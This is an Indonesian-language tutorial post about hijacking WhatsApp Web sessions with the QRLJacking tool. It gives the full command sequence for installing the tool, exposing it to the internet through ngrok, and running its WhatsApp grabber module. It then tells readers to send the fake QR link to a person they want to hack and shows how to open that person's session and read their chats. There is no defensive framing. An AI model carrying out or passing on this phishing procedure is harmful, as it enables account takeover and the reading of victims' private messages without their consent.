Jauh sebelum masa di mana jaringan ponsel secepat sekarang, saat masa di mana kita masih menggunakan Ponsel dengan tombol, kita bertukar pesan teks dan suara menggunakan SMS dan Voice Call melalui jaringan GSM. Namun siapa sangka, internet berevolusi menyediakan layanan pertukaran informasi yang relatif lebih murah dan hemat biaya. Terlebih lagi bisa mengirim gambar, video dan lain sebagainya. SMS dan Voice Call pun mulai jarang digunakan dan orang beralih ke aplikasi pesan instan yang juga bisa disebut dengan aplikasi Chat.

Aplikasi Chat banyak digunakan oleh masyarakat pada tahun 2021 ini, contohnya seperti Telegram, Whatsapp, Messenger dari Facebook, Signal dan lain sebagainya. Whatsapp adalah aplikasi paling populer dari semua aplikasi yang saya sebutkan tadi, tidak hanya itu Whatsapp juga mempunyai fitur Whatsapp Web untuk pengguna agar bisa digunakan pada komputer. Whatsapp web menggunakan fitur Kode QR untuk mengauthentikasi pengguna ke sebuah komputer. Namun siapa sangka, kode QR Whatsapp ini bisa digunakan oleh Hacker untuk menyadap akses Whatsapp anda.

Ternyata, permintaan kode QR dari komputer yang digenerate oleh situs Whatsapp Web itu bisa dipalsukan dengan membuat request kode QR yang sama dari komputer lain. Pemalsuan kode QR ini adalah salah satu teknik social engineering dan juga bisa disebut dengan serangan phising. Kali ini, saya akan menggunakan tool QRLJacking yang bisa kita dapatkan di github. Seperti biasa, untuk host kode QR palsu ini kita membutuhkan port forwarder yang kali ini saya akan menggunakan ngrok.

Baik langsung saja seperti biasa, sebuah PC/Laptop dengan OS Linux.


Selanjutnya, aplikasi QRLJacker yang bisa anda dapatkan di github. 


Untuk mengclone aplikasi tersebut ke Linux, ketik perintah di bawah pada terminal.

git clone https://github.com/OWASP/QRLJacking.git


Masuk ke direktori QRLJacker, ketik perintah di bawah.

cd QRLJacking/QRLJacker


Install persyaratan QRLJacker dengan perintah :

pip3 install -r requirements.txt

 


Berikutnya adalah menginstall geckodriver terbaru. Anda bisa mengunjungi situsnya untuk mengunduh.


Pada komputer saya, karena saya menggunakan Linux 64 bit maka saya mengunduh geckodriver versi Linux 64 bit. Selanjutnya adalah mengekstrak geckodriver tadi.

tar xzvf geckodriver-v0.29.0-linux64.tar.gz



Beri permission pada geckodriver.
chmod +x geckodriver

 


Selanjutnya pindahkan geckodriver ke direktori binary Linux.

sudo mv -f geckodriver /usr/local/share/geckodriver



Berikutnya adalah membuat link geckodriver.

sudo ln -s /usr/local/share/geckodriver    /usr/local/share/geckodriver

sudo ln -s /usr/local/share/geckodriver    /usr/bin/geckodriver



Baik konfigurasi sudah siap, selanjutnya adalah menjalankan port forward ke internet. Seperti tutorial kebanyakan, di sini kita akan menggunakan ngrok. Kita akan mengaktifkan port forward ngrok ke port 8080.

ngrok http 8080



Selanjutnya jalankan QrlJacker dengan python3.


Setelah aplikasi berhasil dijalankan, maka akan tampak seperti tampilan di bawah. 


Setelah berhasil masuk ke Panel QrlJacker, selanjutnya kita tinggal menjalankannya saja. Gunakan modul grabber dengan perintah di bawah. 

use grabber/whatsapp


Konfigurasikan Port dan IP dengan pengaturan berikut. 

set port 8080

set host 0.0.0.0 



Langkah terakhir kita hanya tinggal menjalankannya dengan perintah run.

run


Buka panel ngrok anda kembali, lalu copy link yang ada pada barisan forwarding dan kirimkan ke target yang ingin kalian retas. Pada kasus ini saya akan gunakan komputer windows saya sebagai komputer korban.


Ketika korban membuka alamat link QR Palsu tersebut maka akan tampak tampilan seperti gambar di bawah.


Dan ketika korban menscan kode QR palsu itu, maka tampilan terminal kode QR kita akan tampak seperti di bawah.


Untuk melihat sesi yang aktif kita dapat mengetik perintah di bawah.
sessions

 


Lalu langkah terakhir untuk melihat isi Chat Whatsapp korban kita hanya tinggal mengetik perintah di bawah.
sessions -i 0

 


Lalu kita akan di hadapkan pada isi percakapan Whatsap Web milik target yang kita jebak tadi.


Jika terjadi kendala dalam melakukan eksperimen, coba update mozilla anda ke versi terbaru. Karena minimal versi mozilla dalam melakukan ini adalah versi 69. Atau coba install mozilla baru pada Linux anda. Baik itu saja yang dapat saya sampaikan, lebih dan kurang mohon maaf dan terima kasih. Silahkan komentari jika ada kekurangan.